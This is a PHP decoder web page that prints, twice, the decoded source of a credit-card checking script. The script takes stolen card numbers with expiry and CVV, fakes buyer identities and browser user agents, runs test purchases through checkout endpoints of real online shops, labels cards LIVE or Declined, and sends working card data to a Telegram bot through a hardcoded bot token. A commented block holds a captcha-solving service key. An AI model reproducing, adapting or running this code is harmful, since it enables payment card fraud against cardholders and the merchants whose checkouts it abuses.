Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php set_time_limit(0); error_reporting(0); list($cc, $mm, $yyyy, $cvv) = explode("|",..
Decoded Output download
<?php
set_time_limit(0);
error_reporting(0);
list($cc, $mm, $yyyy, $cvv) = explode("|", preg_replace('/[^0-9|]+/', '', $_GET['lista']));
$lista = "$cc|$mm|$yyyy|$cvv"; $m = substr($mm, 1); $yy = substr($yyyy, 2); $lastfour = substr($cc, 12,16);
$cc1 = substr($cc, 0,4).'+'.substr($cc, 4,4).'+'.substr($cc, 8,4).'+'.substr($cc, 12,4);
$path = 'raizen-cookie';
$randname = array_merge(range('a', 'z'), range('A', 'Z'));
$shuffle = shuffle($randname);
$name = substr(implode($randname), 0, 10);
$cookie = $name.'.txt';
if (is_dir($path) === false) {
mkdir($path);
}
function GenerateUID(int $variant=1){
$charid = strtolower(md5(uniqid(rand(), true)));
$hyphen = chr(45);
if($variant > 0){
$uuid = substr($charid, 0, 8).$hyphen.substr($charid, 8, 4).$hyphen.substr($charid,12, 4).$hyphen.substr($charid,16, 4).$hyphen.substr($charid,20,12);
return $uuid;
}else{
$uuid = substr($charid, 0, 8).substr($charid, 8, 4).substr($charid,12, 4).substr($charid,16, 4).substr($charid,20,12);
return $uuid;
}
}
$session_id = GenerateUID(1);
// $au_script1 = 'rizecutie'.rand().'.txt';
// file_put_contents($au_script1, "const AzCaptcha = require('azcaptcha');
// (async () => {
// const captcha = new AzCaptcha('siapcql7cwzskdvm3buw4t26gvxbehrk')
// try {
// if (await captcha.isBalanceGreaterThan(2)) {
// const taskId = await captcha.createTaskv2('6LeJI_0hAAAAAKA_4bxY8j448ejT6eKKXSWs9Hqx', 'https://www.puratap.com.au/checkout/')
// // console.log(taskId);
// //=> '402049'
// const result = await captcha.pollTaskResult(taskId);
// console.log(result);
// }
// } catch (err) {
// console.log(err);
// //=> 'INVALID SITE KEY etc ...'
// }
// })();
// ");
// $captcha_response = trim(shell_exec('node '.$au_script1));
// unlink($au_script1);
////////////////////////
$au_script = 'rizecutie'.random().'.txt';
file_put_contents($au_script, "const randomUseragent = require('random-useragent');
console.log(randomUseragent.getRandom(function (ua) {
return parseFloat(ua.browserVersion) >= 20;
}));
");
$user_agent = trim(shell_exec('node '.$au_script));
unlink($au_script);
$retry = 0;
retry:
$get = file_get_contents('https://randomuser.me/api/1.2/?nat=us');
preg_match_all("(\"street\":\"(.*)\")siU", $get, $matches1);
$street = $matches1[1][0];
preg_match_all("(\"city\":\"(.*)\")siU", $get, $matches1);
$city = $matches1[1][0];
preg_match_all("(\"state\":\"(.*)\")siU", $get, $matches1);
$state = $matches1[1][0];
preg_match_all("(\"phone\":\"(.*)\")siU", $get, $matches1);
$phone = $matches1[1][0];
preg_match_all('/"postcode":(\d+)/', $get, $matches1);
$postcode = $matches1[1][0];
if (empty($street)) {
$retry++;
goto retry;
}
$name = fname();
$last = lname();
$dmail = $name.$last.rand(111111,999999).''.array('@gmail.com','@hotmail.com','@outlook.com','@hotmail.co.uk')[rand(0,3)].'';
$bin = substr($cc, 0, 1);
if ($bin==4) {
$typez= "001";
$typezz = "Visa";
$typezzz = "VISA";
}
elseif ($bin==5) {
$typez = "002";
$typezz = "MasterCard";
$typezzz = "Master Card";
}
elseif ($bin==6) {
$typez = "DC";
$typezz = "Discover";
$typezzz = "Discover";
}
$phone = rand(11111111111,88818888888);
$zipcode = rand(10,99);
$raizen = curl_init();
curl_setopt_array($raizen,
[
CURLOPT_URL => 'https://bluecordfirearms.com/product/gift-certificates/',
CURLOPT_POST => 1,
CURLOPT_FOLLOWLOCATION => 1,
CURLOPT_HEADER => 0,
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_USERAGENT => $user_agent,
CURLOPT_POSTFIELDS => http_build_query([
'attribute_value' => '$50',
'quantity' => 1,
'add-to-cart' => 6611,
'product_id' => 6611,
'variation_id' => 6617
]),
CURLOPT_COOKIEFILE => getcwd().'/'.$path.'/'.$cookie,
CURLOPT_COOKIEJAR => getcwd().'/'.$path.'/'.$cookie,
CURLOPT_HTTPHEADER => hdr('
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-AU,en;q=0.9
'
)
]
);
$response = curl_exec($raizen);
curl_close($raizen);
$raizen = curl_init();
curl_setopt_array($raizen,
[
CURLOPT_URL => 'https://bluecordfirearms.com/checkout/',
CURLOPT_HTTPGET => 1,
CURLOPT_FOLLOWLOCATION => 1,
CURLOPT_HEADER => 0,
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_USERAGENT => $user_agent,
CURLOPT_COOKIEFILE => getcwd().'/'.$path.'/'.$cookie,
CURLOPT_COOKIEJAR => getcwd().'/'.$path.'/'.$cookie,
CURLOPT_HTTPHEADER => hdr('
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-AU,en;q=0.9
'
)
]
);
$response = curl_exec($raizen);
curl_close($raizen);
$nonce = r($response, '<input type="hidden" id="woocommerce-process-checkout-nonce" name="woocommerce-process-checkout-nonce" value="','"');
$context = r($response, '"capture_context":"','"');
$cyber_session = r($response, '"wc_cybersource_credit_card_device_data_session_id" value="','"');
$mercode = r($response, '"merchant_code":"','"');
$cliid = r($response, '"client_id":"','"');
$sucurenonce = r($response, 'name="fgc_securepay_nonce" value="','">');
$raizen = curl_init();
curl_setopt_array($raizen,
[
CURLOPT_URL => 'https://www.puratap.com.au/?wc-ajax=checkout',
CURLOPT_POST => 1,
CURLOPT_FOLLOWLOCATION => 1,
CURLOPT_HEADER => 0,
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_USERAGENT => $user_agent,
CURLOPT_POSTFIELDS => http_build_query([
'billing_first_name' => $name,
'billing_last_name' => $dmail,
'billing_company' => $last,
'billing_country' => 'US',
'billing_address_1' => 'DA',
'billing_address_2' => '26517 DANTI CT',
'billing_city' => 'HAYWARD',
'billing_state' => 'CA',
'billing_postcode' => '94545-3917',
'billing_phone' => $phone,
'billing_email' => $dmail,
'shipping_first_name' => '',
'shipping_last_name' => '',
'shipping_company' => '',
'shipping_country' => 'US',
'shipping_address_1' => '26517 Danti Court',
'shipping_address_2' => '',
'shipping_city' => 'Hayward',
'shipping_state' => 'CA',
'shipping_postcode' => '94545',
'shipping_phone' => '',
'shipping_method[0]' => 'flat_rate:4',
'payment_method' => 'securepay',
'securePayToken' => $tokval,
'securePay3DSSecure' => '',
'securePayOrderId' => '',
'payment_currency' => 'AUD',
'dccQuote' => '',
'card_scheme' => 'visa',
'_securepay_security' => 'no',
'fgc_securepay_nonce' => $sucurenonce,
'terms' => 'on',
'terms-field' => '1',
'g-recaptcha-response' => $captcha_response,
'woocommerce-process-checkout-nonce' => $nonce,
'_wp_http_referer' => '/?wc-ajax=update_order_review'
]),
CURLOPT_COOKIEFILE => getcwd().'/'.$path.'/'.$cookie,
CURLOPT_COOKIEJAR => getcwd().'/'.$path.'/'.$cookie,
CURLOPT_HTTPHEADER => hdr('
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-AU,en;q=0.9
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
x-requested-with: XMLHttpRequest
'
)
]
);
echo $response = curl_exec($raizen);
curl_close($raizen);
// $msg = r($response, '
Status code: ',' <\/li>
');
$msg = strip_tags(json_decode($response,1)['messages']);
if(strpos($response, 'success')){
file_get_contents('https://api.telegram.org/bot5587870434:AAFdGjo4wudptj_DQYT72jRBjeWSffnqzY8/sendMessage?chat_id=5117560499&text='.$lista.'|Charged ');
echo '#LIVE '.$lista.' => '.$response.'';
}
// elseif (empty($msg)) {
// $retry++;
// goto retry;
// }
// elseif(strpos($wc, 'Please wait while your request is being verified')) {
// $retry++;
// goto retry;
// }
elseif(strpos($response, 'messages')){
echo 'LIVE '.$lista.' => '.$msg.' [Retries: '.$retry.'])';
}
elseif($decision == 'ERROR') {
echo 'LIVE '.$lista.' => '.$msg.' [Retries: '.$retry.'])';
}
else {
echo '#Declined '.$lista.' => '.$response.'';
}
function r($a, $b, $c){
return explode($c, explode($b, $a)[1])[0];
}
function random($length = 10){
$str = '';
$_s = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwyxz0123456789';
$strlen = strlen($_s);
for($x = $length; $x != 0; $x--){
$str .= $_s[mt_rand(1, $strlen)-1];
}
return $str;
}
function hdr($s) {
foreach (explode("
", $s) as $key => $value) {
$h[$key] = ltrim($value, " ");
} return $h;
}
function fname($z1=5){$u2='';$x3=array("a","e","i","o","u");$c4=array('b','c','d','f','g','h','j','k','l','m','n','p','r','s','t','v','w','x','y','z');$f5=$z1/2;for($y6=1;$y6<=$f5;$y6++){$u2.=$c4[rand(0,19)];$u2.=$x3[rand(0,4)];}return $u2;}
function lname($z1=7){$u2='';$x3=array("a","e","i","o","u");$c4=array('b','c','d','f','g','h','j','k','l','m','n','p','r','s','t','v','w','x','y','z');$f5=$z1/2;for($y6=1;$y6<=$f5;$y6++){$u2.=$c4[rand(0,19)];$u2.=$x3[rand(0,4)];}return $u2;}
unlink('raizen-cookie/'.$cookie.'');
ob_flush();
die();
?>
Did this file decode correctly?
Original Code
<?php
set_time_limit(0);
error_reporting(0);
list($cc, $mm, $yyyy, $cvv) = explode("|", preg_replace('/[^0-9|]+/', '', $_GET['lista']));
$lista = "$cc|$mm|$yyyy|$cvv"; $m = substr($mm, 1); $yy = substr($yyyy, 2); $lastfour = substr($cc, 12,16);
$cc1 = substr($cc, 0,4).'+'.substr($cc, 4,4).'+'.substr($cc, 8,4).'+'.substr($cc, 12,4);
$path = 'raizen-cookie';
$randname = array_merge(range('a', 'z'), range('A', 'Z'));
$shuffle = shuffle($randname);
$name = substr(implode($randname), 0, 10);
$cookie = $name.'.txt';
if (is_dir($path) === false) {
mkdir($path);
}
function GenerateUID(int $variant=1){
$charid = strtolower(md5(uniqid(rand(), true)));
$hyphen = chr(45);
if($variant > 0){
$uuid = substr($charid, 0, 8).$hyphen.substr($charid, 8, 4).$hyphen.substr($charid,12, 4).$hyphen.substr($charid,16, 4).$hyphen.substr($charid,20,12);
return $uuid;
}else{
$uuid = substr($charid, 0, 8).substr($charid, 8, 4).substr($charid,12, 4).substr($charid,16, 4).substr($charid,20,12);
return $uuid;
}
}
$session_id = GenerateUID(1);
// $au_script1 = 'rizecutie'.rand().'.txt';
// file_put_contents($au_script1, "const AzCaptcha = require('azcaptcha');
// (async () => {
// const captcha = new AzCaptcha('siapcql7cwzskdvm3buw4t26gvxbehrk')
// try {
// if (await captcha.isBalanceGreaterThan(2)) {
// const taskId = await captcha.createTaskv2('6LeJI_0hAAAAAKA_4bxY8j448ejT6eKKXSWs9Hqx', 'https://www.puratap.com.au/checkout/')
// // console.log(taskId);
// //=> '402049'
// const result = await captcha.pollTaskResult(taskId);
// console.log(result);
// }
// } catch (err) {
// console.log(err);
// //=> 'INVALID SITE KEY etc ...'
// }
// })();
// ");
// $captcha_response = trim(shell_exec('node '.$au_script1));
// unlink($au_script1);
////////////////////////
$au_script = 'rizecutie'.random().'.txt';
file_put_contents($au_script, "const randomUseragent = require('random-useragent');
console.log(randomUseragent.getRandom(function (ua) {
return parseFloat(ua.browserVersion) >= 20;
}));
");
$user_agent = trim(shell_exec('node '.$au_script));
unlink($au_script);
$retry = 0;
retry:
$get = file_get_contents('https://randomuser.me/api/1.2/?nat=us');
preg_match_all("(\"street\":\"(.*)\")siU", $get, $matches1);
$street = $matches1[1][0];
preg_match_all("(\"city\":\"(.*)\")siU", $get, $matches1);
$city = $matches1[1][0];
preg_match_all("(\"state\":\"(.*)\")siU", $get, $matches1);
$state = $matches1[1][0];
preg_match_all("(\"phone\":\"(.*)\")siU", $get, $matches1);
$phone = $matches1[1][0];
preg_match_all('/"postcode":(\d+)/', $get, $matches1);
$postcode = $matches1[1][0];
if (empty($street)) {
$retry++;
goto retry;
}
$name = fname();
$last = lname();
$dmail = $name.$last.rand(111111,999999).''.array('@gmail.com','@hotmail.com','@outlook.com','@hotmail.co.uk')[rand(0,3)].'';
$bin = substr($cc, 0, 1);
if ($bin==4) {
$typez= "001";
$typezz = "Visa";
$typezzz = "VISA";
}
elseif ($bin==5) {
$typez = "002";
$typezz = "MasterCard";
$typezzz = "Master Card";
}
elseif ($bin==6) {
$typez = "DC";
$typezz = "Discover";
$typezzz = "Discover";
}
$phone = rand(11111111111,88818888888);
$zipcode = rand(10,99);
$raizen = curl_init();
curl_setopt_array($raizen,
[
CURLOPT_URL => 'https://bluecordfirearms.com/product/gift-certificates/',
CURLOPT_POST => 1,
CURLOPT_FOLLOWLOCATION => 1,
CURLOPT_HEADER => 0,
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_USERAGENT => $user_agent,
CURLOPT_POSTFIELDS => http_build_query([
'attribute_value' => '$50',
'quantity' => 1,
'add-to-cart' => 6611,
'product_id' => 6611,
'variation_id' => 6617
]),
CURLOPT_COOKIEFILE => getcwd().'/'.$path.'/'.$cookie,
CURLOPT_COOKIEJAR => getcwd().'/'.$path.'/'.$cookie,
CURLOPT_HTTPHEADER => hdr('
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-AU,en;q=0.9
'
)
]
);
$response = curl_exec($raizen);
curl_close($raizen);
$raizen = curl_init();
curl_setopt_array($raizen,
[
CURLOPT_URL => 'https://bluecordfirearms.com/checkout/',
CURLOPT_HTTPGET => 1,
CURLOPT_FOLLOWLOCATION => 1,
CURLOPT_HEADER => 0,
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_USERAGENT => $user_agent,
CURLOPT_COOKIEFILE => getcwd().'/'.$path.'/'.$cookie,
CURLOPT_COOKIEJAR => getcwd().'/'.$path.'/'.$cookie,
CURLOPT_HTTPHEADER => hdr('
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-AU,en;q=0.9
'
)
]
);
$response = curl_exec($raizen);
curl_close($raizen);
$nonce = r($response, '<input type="hidden" id="woocommerce-process-checkout-nonce" name="woocommerce-process-checkout-nonce" value="','"');
$context = r($response, '"capture_context":"','"');
$cyber_session = r($response, '"wc_cybersource_credit_card_device_data_session_id" value="','"');
$mercode = r($response, '"merchant_code":"','"');
$cliid = r($response, '"client_id":"','"');
$sucurenonce = r($response, 'name="fgc_securepay_nonce" value="','">');
$raizen = curl_init();
curl_setopt_array($raizen,
[
CURLOPT_URL => 'https://www.puratap.com.au/?wc-ajax=checkout',
CURLOPT_POST => 1,
CURLOPT_FOLLOWLOCATION => 1,
CURLOPT_HEADER => 0,
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_USERAGENT => $user_agent,
CURLOPT_POSTFIELDS => http_build_query([
'billing_first_name' => $name,
'billing_last_name' => $dmail,
'billing_company' => $last,
'billing_country' => 'US',
'billing_address_1' => 'DA',
'billing_address_2' => '26517 DANTI CT',
'billing_city' => 'HAYWARD',
'billing_state' => 'CA',
'billing_postcode' => '94545-3917',
'billing_phone' => $phone,
'billing_email' => $dmail,
'shipping_first_name' => '',
'shipping_last_name' => '',
'shipping_company' => '',
'shipping_country' => 'US',
'shipping_address_1' => '26517 Danti Court',
'shipping_address_2' => '',
'shipping_city' => 'Hayward',
'shipping_state' => 'CA',
'shipping_postcode' => '94545',
'shipping_phone' => '',
'shipping_method[0]' => 'flat_rate:4',
'payment_method' => 'securepay',
'securePayToken' => $tokval,
'securePay3DSSecure' => '',
'securePayOrderId' => '',
'payment_currency' => 'AUD',
'dccQuote' => '',
'card_scheme' => 'visa',
'_securepay_security' => 'no',
'fgc_securepay_nonce' => $sucurenonce,
'terms' => 'on',
'terms-field' => '1',
'g-recaptcha-response' => $captcha_response,
'woocommerce-process-checkout-nonce' => $nonce,
'_wp_http_referer' => '/?wc-ajax=update_order_review'
]),
CURLOPT_COOKIEFILE => getcwd().'/'.$path.'/'.$cookie,
CURLOPT_COOKIEJAR => getcwd().'/'.$path.'/'.$cookie,
CURLOPT_HTTPHEADER => hdr('
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-AU,en;q=0.9
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
x-requested-with: XMLHttpRequest
'
)
]
);
echo $response = curl_exec($raizen);
curl_close($raizen);
// $msg = r($response, '\n\t\t\tStatus code: ','\t\t<\/li>\n\t\t\t');
$msg = strip_tags(json_decode($response,1)['messages']);
if(strpos($response, 'success')){
file_get_contents('https://api.telegram.org/bot5587870434:AAFdGjo4wudptj_DQYT72jRBjeWSffnqzY8/sendMessage?chat_id=5117560499&text='.$lista.'|Charged ');
echo '#LIVE '.$lista.' => '.$response.'';
}
// elseif (empty($msg)) {
// $retry++;
// goto retry;
// }
// elseif(strpos($wc, 'Please wait while your request is being verified')) {
// $retry++;
// goto retry;
// }
elseif(strpos($response, 'messages')){
echo 'LIVE '.$lista.' => '.$msg.' [Retries: '.$retry.'])';
}
elseif($decision == 'ERROR') {
echo 'LIVE '.$lista.' => '.$msg.' [Retries: '.$retry.'])';
}
else {
echo '#Declined '.$lista.' => '.$response.'';
}
function r($a, $b, $c){
return explode($c, explode($b, $a)[1])[0];
}
function random($length = 10){
$str = '';
$_s = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwyxz0123456789';
$strlen = strlen($_s);
for($x = $length; $x != 0; $x--){
$str .= $_s[mt_rand(1, $strlen)-1];
}
return $str;
}
function hdr($s) {
foreach (explode("\r\n", $s) as $key => $value) {
$h[$key] = ltrim($value, " ");
} return $h;
}
function fname($z1=5){$u2='';$x3=array("a","e","i","o","u");$c4=array('b','c','d','f','g','h','j','k','l','m','n','p','r','s','t','v','w','x','y','z');$f5=$z1/2;for($y6=1;$y6<=$f5;$y6++){$u2.=$c4[rand(0,19)];$u2.=$x3[rand(0,4)];}return $u2;}
function lname($z1=7){$u2='';$x3=array("a","e","i","o","u");$c4=array('b','c','d','f','g','h','j','k','l','m','n','p','r','s','t','v','w','x','y','z');$f5=$z1/2;for($y6=1;$y6<=$f5;$y6++){$u2.=$c4[rand(0,19)];$u2.=$x3[rand(0,4)];}return $u2;}
unlink('raizen-cookie/'.$cookie.'');
ob_flush();
die();
?>
Function Calls
None |
Stats
MD5 | 7b440c0766d5dcefbcf857c9b06ac02e |
Eval Count | 0 |
Decode Time | 65 ms |